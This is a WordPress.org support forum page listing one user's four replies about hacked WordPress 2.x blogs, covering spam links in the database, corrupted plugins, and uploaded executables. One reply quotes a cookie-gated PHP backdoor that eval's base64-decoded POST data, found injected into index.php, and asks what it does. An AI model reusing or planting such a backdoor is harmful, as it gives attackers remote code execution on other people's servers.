Title: 's Replies | WordPress.org

---

# khalidmsyed

  [  ](https://wordpress.org/support/users/khalidmsyed/)

 *   [Profile](https://wordpress.org/support/users/khalidmsyed/)
 *   [Topics Started](https://wordpress.org/support/users/khalidmsyed/topics/)
 *   [Replies Created](https://wordpress.org/support/users/khalidmsyed/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/khalidmsyed/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/khalidmsyed/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/khalidmsyed/engagements/)
 *   [Favorites](https://wordpress.org/support/users/khalidmsyed/favorites/)

 Search replies:

## Forum Replies Created

Viewing 4 replies - 1 through 4 (of 4 total)

 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [WP 2.7 Can Be Hacked… FYI](https://wordpress.org/support/topic/wp-27-can-be-hacked-fyi/)
 *  [khalidmsyed](https://wordpress.org/support/users/khalidmsyed/)
 * (@khalidmsyed)
 * [17 years, 4 months ago](https://wordpress.org/support/topic/wp-27-can-be-hacked-fyi/page/3/#post-937925)
 * chowell18, I experienced a similar hack few months ago when I was running a very
   old version of WP. Those spam links are probably stored in your database. You
   will have to go to PHPAdmin, goto right database/table, open each article, remove
   spam links and then save the article. If you have a clean database backup to 
   restore from then that will make your job easier. But, probably 2.3.3 database
   will not work with 2.7. So, your options are:
 * (1) Stay at WP 2.7 and clean up each article by going to PHPAdmin as described
   above.
    (2) Go back to WP 2.3.3, restore from clean database backup, upgrade 
   to WP 2.7 once again.
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Help please I cannot log in](https://wordpress.org/support/topic/help-please-i-cannot-log-in/)
 *  [khalidmsyed](https://wordpress.org/support/users/khalidmsyed/)
 * (@khalidmsyed)
 * [17 years, 4 months ago](https://wordpress.org/support/topic/help-please-i-cannot-log-in/#post-936315)
 * Ok, thanks for that.
    I have read that thread and found some things on my blog
   that needed fixing. One of the exploits mentioned was that the hacker uploads
   an executable to /uploads folder and then tries to execute it. This exploit works
   because /uploads is a default and well-known location. If I let’s say change 
   the upload location to /uploadsxyz then the exploit won’t work because the hacker
   would be trying to run the executable from wrong folder. Right?
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Help please I cannot log in](https://wordpress.org/support/topic/help-please-i-cannot-log-in/)
 *  [khalidmsyed](https://wordpress.org/support/users/khalidmsyed/)
 * (@khalidmsyed)
 * [17 years, 5 months ago](https://wordpress.org/support/topic/help-please-i-cannot-log-in/#post-936097)
 * Another thing.
    While looking at blog files, I noticed that index.php had been
   modified recently on my blogs that had the logon issue. I could see following
   extra code in there that I had not seen before:
 * _<?php if(md5($\_COOKIE[‘9dd4c670373e0a5d’])==”03d6f1e62bba8efe0f71093d258a3c2a”){
   eval(base64\_decode($\_POST[‘file’])); exit; } ?>_
 * Does anyone know what this code does? Did someone try to hack my blog but succeeded
   only partially?
 * Khalid
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Help please I cannot log in](https://wordpress.org/support/topic/help-please-i-cannot-log-in/)
 *  [khalidmsyed](https://wordpress.org/support/users/khalidmsyed/)
 * (@khalidmsyed)
 * [17 years, 5 months ago](https://wordpress.org/support/topic/help-please-i-cannot-log-in/#post-936095)
 * I had similar problem twice recently. The only difference was that instead of
   going back to same page my logon page would hang for minutes and then timeout.
 * Turned out that this was due to corrupt plugins. I had to goto my hosting control
   panel and then goto /wp-content/plugins. There I saw that some plugin files/folders
   had changed recently. I deleted those plugins one by one and then re-tried login.
   Finally it started working.
 * I am not sure why this happens. Maybe the plugin tries to do auto-update and 
   gets corrupted, although auto-update is not enabled.
 * Kind regards
 * Khalid

Viewing 4 replies - 1 through 4 (of 4 total)